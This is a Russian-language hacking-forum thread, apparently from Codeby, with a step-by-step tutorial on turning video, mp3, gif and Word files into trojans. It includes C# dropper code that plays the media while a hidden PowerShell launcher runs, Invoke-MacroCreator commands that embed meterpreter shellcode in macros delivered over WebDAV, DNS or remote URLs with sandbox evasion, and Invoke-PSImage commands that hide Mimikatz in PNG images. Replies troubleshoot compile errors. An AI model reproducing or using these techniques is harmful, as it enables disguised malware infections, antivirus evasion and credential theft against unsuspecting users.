• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%

  • Автор темы Ondrik8
  • Дата начала
Ondrik8

Ondrik8

prodigy
Happy New Year
08.11.2016
1 006
2 988
Всем привет, решил здесь оставить свой след в ветке, касаемо нашей любимой темы, пусть останется в веках!))
Заражать мы будем самые распространенные файлы которыми пользуется каждый, так же решил, я еще и доказать Вам свою проф пригодность)
да и думаю не хер в себе все держать! Нужно делится своими находками и наработками! Чего и Вам желаю..

одно подозрительное слово "находками" Да признаюсь сразу эту технику я честно.... спиздил, но при минимальном знании программирования и работай с visual-studio
ее можно настроить под себя)

Итак начнем, с заражения видео файла. Нам по требуется visual-studio 2017 с языком С#, Empire or Metasploit. Я лично буду юзать империю.

Генерим в империи батник, предварительно настроив listener : usestager | windows/launcher_bat убираем лишнее, берем нужное как показано ниже!

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%


эту сборочку открываем в студии и ..

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%


как видите редачим, файл Program.cs и вставляем в 21(очко)) строчку свою строчку сгенеренную в империи)
Детект только один из 40 палит только касперыч(
все просто до "не могу" И не дай мне Бог увидеть эти методики на каких нить РУ-бордах так как я знаю что в РУ-зоне впервые они описываются!) и как этот видео проект создавался Вы поймете ниже на примере создания mp3-virus

Заражаем mp3

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%


Создаем проект как показано выше. Удаляем стандартное заполнение и вставляем свое:

Код:
using System;
using System.IO;
using System.Diagnostics;

namespace Namespace
{
    class Program
    {
        static void Main()
        {
            // Copiar el vídeo a un archivo temporal y abrirlo
            byte[] archivo = Properties.Resources.NombreArchivo;
            string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\nombre_archivo.extension");
            File.WriteAllBytes(destino, archivo);
            Process procesoArchivo = Process.Start(destino);

            // Ejecutar launcher
            ProcessStartInfo launcherProcess = new ProcessStartInfo();
            // C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            launcherProcess.FileName =  Environment.ExpandEnvironmentVariables(@"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe");
            launcherProcess.Arguments = "-Command Add-Type -AssemblyName 'System.Windows.Forms'; [Windows.Forms.Messagebox]::Show('Hacked')";
            launcherProcess.WindowStyle = ProcessWindowStyle.Hidden;
            Process.Start(launcherProcess);

            // Esperar a que cierren el vídeo/imagen/pdf, lo que sea
            procesoArchivo.WaitForExit();
            // Eliminar nuestro vídeo
            while (File.Exists(destino))
            {
                try
                {
                    File.Delete(destino);
                }
                catch {}
            }
        }
    }
}

[обратите внимание на 25 строку в коде] Уже уловили суть? хех..
Самое главное видео показывает и музыка играет, а к Вам прилетает заветная сессия!)​


переименовываем 5 строчку

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%



в свойствах ConsoleApp1 добавляем mp3 ресурс

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%



назовем его codeby.mp3

далее изменяем эти строки:

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%


ну и "грузим" своей нагрузкой в нашу 21 строку

coздаем иконку зайдя на этот онлайн эту .ico грузим к себе в ресурсы нашей злой эмпэтри - прожки ))

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%


и собираем наше творение...

с GIF-ками и PDF-ками я думаю справитесь....


теперь макрос-ы "Эх! Говорит и показывает Рассея" Шариков П.П

слышали про Invoke лютого криптовщика PowerShell так вот создали продукт на основе его трудов.


[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%


Свежачок, для красной братвы!)


Шеллкод, встроенный в тело документа MS-Word, без обфускации, без уклонения от песочницы:

Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body
Шеллкод передается по скрытому каналу WebDAV с обфускацией, без уклонения от песочницы:

Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o
Сценарий доставлен по библиографическому источнику скрытого канала, с обфускацией, с уклонением песочницы:

Код:
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
Исполняемый файл передается через скрытый канал WebDAV, используя UNC, без обфускации, с уклонением от песочницы, используя метод выполнения 3:

Код:
C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3
Командная строка, встроенная в тело документа MS-Word, с обфускацией, без уклонения от песочницы, с использованием метода выполнения 1:

Код:
C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1
Шеллкод, встроенный в комментарий документа MS-Word, не обфускация, отсутствие уклонения от песочницы, добавление функций автоматического открытия:

Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -a
Шеллкод, поставляемый по скрытому каналу доставки DNS с использованием домена «mydomain.com», с обфускацией, без уклонения от песочницы:

Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -o
Функционал как видите впечатляет, но я пока не тестил и пожалуйста как будете собирать макросы по делитесь здесь буду благодарен очень, честно... Да и другим тоже будет полезно это увидеть)


Спасибо за внимание, с вами был на веки Ваш Ondrik8)
 
Последнее редактирование:
The Codeby

The Codeby

ООО Кодебай
30.12.2015
3 231
4 646
Отличный пример классной статьи! С почином в красной ветке ;)
 
  • Нравится
Реакции: Ondrik8 и OneDollar
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Круто
 
Ondrik8

Ondrik8

prodigy
Happy New Year
08.11.2016
1 006
2 988
Две новости и все хорошие!)

Новый

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%



Бля, понять не могу что у них за логотип?) У этих епнутых англичан...

ии.... гвоздь сегодняшнего дня! та-дааам... Заражаем через )) PNG то есть в картинке в пикселях "полезная" нагрузка (PAYLOAD) нам же стоит только закинуть считыватель этого трояна, который в свою очередь считывает код с картинки и откроет нам?
правильно,) "задний проход" через который мы с успехом и залезем!) Фу бля( пишу и дурная картинка перед глазами встала...

[В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%



изображение 1920x1200

-Script [путь к файлу ] Путь к скрипту для вставки в изображение.

-Image [filepath] Изображение для встраивания скрипта в.

-Out [filepath] Файл для сохранения полученного изображения (изображение будет PNG)

-Web Выведите команду для чтения изображения из Интернета вместо чтения из файла. Вам нужно будет разместить изображение и вставить URL-адрес в команду.


Создаём картинку со "сценарием" «Invoke-Mimikatz.ps1», встроенным в него, и выведите oneliner для выполнения с диска, то есть офлайн или в локалке, методика так себе, не очень..

Код:
PS>Import-Module .\Invoke-PSImage.ps1

PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png
   [Oneliner to execute from a file]
Создаём картинку с вложенным в него "сценарием" «Invoke-Mimikatz.ps1» и выведите oneliner для выполнения из интернета, то есть вешаем на хост) и пусть висит с пикселями волшебными..

Код:
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png -Web
   [Oneliner to execute from the web]


Удачи!
 
kot-gor

kot-gor

Gold Team
07.09.2016
523
682
Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?
 

Вложения

Последнее редактирование:
mrOkey

mrOkey

Red Team
14.11.2017
623
718
Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?
попробуй явно namespace указать
Код:
ConsoleApp4.Properties.Resources.codeby
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?
Будет в ехе)
 
jonni80

jonni80

Happy New Year
24.06.2017
39
6
Всем добрый вечер.. если рассматривать mp3,при компиляции появляются ошибки.Не пойму где ложанулся, вроде делаю всё правильно.Одрик не подскажешь в чем может быть проблема? И еще один вопрос вывод файла будет в расширении exe?
такая же проблема. пробывал и namespase перед Properties выставлять , ошибка не уходит.
 
jonni80

jonni80

Happy New Year
24.06.2017
39
6
Код:
byte[] archivo = pesna.Properties.Resources.pesna1;
            string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\pesna.mp3");
            File.WriteAllBytes(destino, archivo);
            Process procesoArchivo = Process.Start(destino);
Имя вставляемого Resources должно отличаться от Имени сборки. тогда ошибки нет
 
  • Нравится
Реакции: WildMilk
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб